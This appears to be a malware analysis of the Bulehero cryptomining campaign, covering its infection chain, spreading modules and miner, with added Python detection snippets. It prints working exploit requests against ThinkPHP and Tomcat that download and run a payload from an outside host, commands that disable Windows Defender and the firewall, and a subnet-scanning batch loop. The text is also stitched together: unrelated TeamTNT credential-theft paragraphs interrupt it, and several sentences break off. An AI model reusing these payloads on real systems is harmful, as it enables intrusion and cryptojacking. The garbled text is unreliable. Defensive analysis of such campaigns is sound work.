Below is an overview of the system activity of Download.exe.


  • Creates a process xsvinmat.exe (found in the body)
  • Creates a service {random}.exe
    • Modular Plugin Component
    • Connects to a45[.]bulehero[.]in via TCP port 1356 to send and receive some data
  • Downloads a file from a46[.]bulehero[.]in via HTTP GET /docropool.exe. It saves the file as %TEMP%\docropool.exe and executes it.
  • Docropool.exe creates a separate process of itself at C:\Windows\docropool.exe
  • C:\Windows\docropool.exe will start several processes to install a cryptominer, weaken the system, stop some Windows services and spread across the network.


GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(‘http://a46[.]bulehero[.]in/download.exe’,’C:/14.exe’);start%20C:/14.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)


Installation

1st Stage Payload: Download.exe

The full payload is downloaded from one domain (a46[.]bulehero[.]in), after which this campaign is named.

For instance, if the machine’s public IP is, it will attempt to scan to

Windows Defender and Windows Services

The Bulehero malware disables the Windows Defender service, which is typical for malware, but it also disables Windows shares, probably to avoid reinfecting the system or to keep competing botnets from taking control of it.

Command                          Description
cmd /c net stop SharedAccess     Disables Internet Connection Sharing Service
cmd /c net stop MpsSvc           Disables Windows Firewall
cmd /c net stop WinDefend        Disables Windows Defender
cmd /c net stop wuauserv         Disables Windows Update
cmd /c net stop LanmanServer     Disables Windows Sharing
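The service stops in the table above can be hunted for as a cluster rather than one at a time. The following is an added example, not code from the original report: it flags hosts where several of the listed services are stopped close together. The event tuples, host names, 5-minute window and threshold of 3 are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Service names from the table above, lower-cased for comparison.
WATCHED = {"sharedaccess", "mpssvc", "windefend", "wuauserv", "lanmanserver"}
# net.exe hands off to net1.exe, so accept either image name.
STOP_RE = re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?([\w$-]+)', re.I)

# Constructed process-creation events: (ISO timestamp, host, command line).
EVENTS = [
    ("2019-01-10T03:14:05", "SRV01", "cmd /c net stop SharedAccess"),
    ("2019-01-10T03:14:06", "SRV01", "cmd /c net stop MpsSvc"),
    ("2019-01-10T03:14:07", "SRV01", "cmd /c net stop WinDefend"),
    ("2019-01-10T03:14:08", "SRV01", "cmd /c net stop wuauserv"),
    ("2019-01-10T03:14:09", "SRV01", "cmd /c net stop LanmanServer"),
    ("2019-01-10T09:00:00", "WS02", "net stop wuauserv"),        # lone admin action
    ("2019-01-10T10:00:00", "SRV03", "cmd /c net stop MpsSvc"),  # spread over hours
    ("2019-01-10T13:00:00", "SRV03", "net1 stop WinDefend"),
    ("2019-01-10T16:30:00", "SRV03", "net stop wuauserv"),
]

def flag_hosts(events, window=timedelta(minutes=5), threshold=3):
    """Return {host: sorted services} where at least `threshold` distinct
    watched services were stopped within `window` (assumed triage values)."""
    per_host = defaultdict(list)
    for ts, host, cmd in events:
        m = STOP_RE.search(cmd)
        if m and m.group(1).lower() in WATCHED:
            per_host[host].append((datetime.fromisoformat(ts), m.group(1).lower()))
    flagged = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            # Distinct services stopped inside the window opened by this hit.
            seen = {svc for t, svc in hits[i:] if t - start <= window}
            if len(seen) >= threshold:
                flagged[host] = sorted(seen)
                break
    return flagged

if __name__ == "__main__":
    print(flag_hosts(EVENTS))
```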

Conclusion

This campaign is one of several we have seen that target Windows servers.

The following section will detail each spreading technique.

EternalBlue and DoublePulsar

This routine tries to execute the bulehero downloader on SMB ports 445 and 139 using the EternalBlue exploit and the DoublePulsar backdoor.

It drops the following files in the C:\Windows\InfusedAppe\LocalService directory:

  • AppCapture_x32.dll (32-bit bulehero bot downloader)
  • AppCapture_x64.dll (64-bit bulehero bot downloader)
  • Spoolsrv.xml (EternalBlue config)
  • Svschost.xml (DoublePulsar config)
  • Specials\spoolsrv.exe (EternalBlue Component)
  • Specials\svschost.exe (DoublePulsar Backdoor)

The following routine essentially executes AppCapture_x32.dll on the target machine if the exploit attack is successful.



Tomcat PUT arbitrary file upload vulnerability (CVE-2017-12615)

GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46[.]bulehero[.]in/download.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}

ThinkPHP vulnerability

Two types of exploit target this vulnerability; which one is used depends on the file path of the web app it is trying to exploit.
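Because the ThinkPHP request varies by install path, a web-log check is more reliable when it matches the decoded s= route instead of the path. The following is an added example, not code from the original report: it classifies request lines shaped like the ThinkPHP and FxCodeShell.jsp captures on this page and extracts, defanged, any second-stage URL they carry. The sample lines, the host stage.example.invalid, the /app/ path and the rule names are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

URL_RE = re.compile(r"https?://[^\s'\",)]+", re.I)

# Constructed request lines modelled on the captures above; the host, the
# /app/ path and the parameter values are placeholders, not campaign data.
SAMPLES = [
    "GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array"
    "&vars%5B0%5D=system&vars%5B1%5D%5B%5D=fetch%20http://stage.example.invalid/download.exe HTTP/1.1",
    "GET /app/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array"
    "&vars%5B0%5D=system&vars%5B1%5D%5B%5D=placeholder HTTP/1.1",
    "GET /FxCodeShell.jsp?wiew=PLACEHOLDER&os=1&address=http://stage.example.invalid/download.exe HTTP/1.1",
    "GET /index.php?s=news/list&page=2 HTTP/1.1",
]

def defang(url):
    """Render a URL in the a46[.]example style so it is not clickable."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc.replace('.', '[.]')}{p.path}"

def classify(request_line):
    """Return (rule, [defanged URLs]) for a suspicious request line, else None."""
    _method, rest = request_line.split(" ", 1)
    target = rest.rsplit(" ", 1)[0]            # drop the trailing HTTP/1.1
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes
    qs = {k.lower(): v for k, v in params}
    # ThinkPHP: key on the decoded s= route, not the path, so every
    # install location of index.php is covered by one rule.
    route = qs.get("s", "").replace("\\", "/").lower()
    if route.endswith("think/app/invokefunction") and \
            qs.get("function", "").lower() == "call_user_func_array":
        rule = "thinkphp-invokefunction"
    # Tomcat: request to the uploaded FxCodeShell.jsp carrying an address= URL.
    elif parts.path.lower().endswith("/fxcodeshell.jsp") and "address" in qs:
        rule = "fxcodeshell-download"
    else:
        return None
    urls = sorted({defang(u) for _, v in params for u in URL_RE.findall(v)})
    return rule, urls

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line))
```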

It includes the following configuration file for its mining and spreading function.

XMRig Miner

We believe that the primary goal of this campaign is to install a miner. When docropool.exe is executed, it drops the XMRig miner as C:\Windows\TEMP\Networks\taskmgr.exe and executes it.

They said they sent a collection of canary credentials to the TeamTNT C&C server, but none of those accounts have been accessed prior to Aug. 17, when they published their research.

Nevertheless, when the attackers decide to do so, TeamTNT stands to seriously boost its profits, either by installing crypto-mining malware in more powerful AWS EC2 clusters directly or by selling the stolen credentials on the black market.

Right now, Cado has only a limited view into TeamTNT’s operation, as the security firm has been able to track only a few of the Monero wallet addresses that the group uses to collect mined funds.

Curl is used to send the AWS credentials to TeamTNT’s server.”

Interestingly, though the script is written to be a worm, the automated portion of the attack didn’t seem to be in full operation during the security firm’s analysis.

“We sent credentials created by to TeamTNT, however have not seen them in use yet,” according to the post. “This indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn’t currently functioning.”

The script that anchors TeamTNT’s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself.

This port is commonly tied to the Oracle WebLogic vulnerability, which it exploits.


Port Scanner

To check whether ports are open on the network, it uses a custom port scanner. This file is saved as C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe. It is executed by a batch file as follows:

cd C:\Windows\InfusedAppe\Priess\

for /f "eol= tokens=1,2 delims= " %%i in (C:\Windows\InfusedAppe\Priess\ip.txt) do GoogleCdoeUpdate.exe tcp %%i %%j 445 256 /save

Ip.txt contains a list of network segments, e.g.,

Aside from internal networks, it can also attack the external network subnet. It gets the current machine’s public IP from http://2019[.]ip138[.]com/ic.asp and attacks the class C subnet of that public IP address.
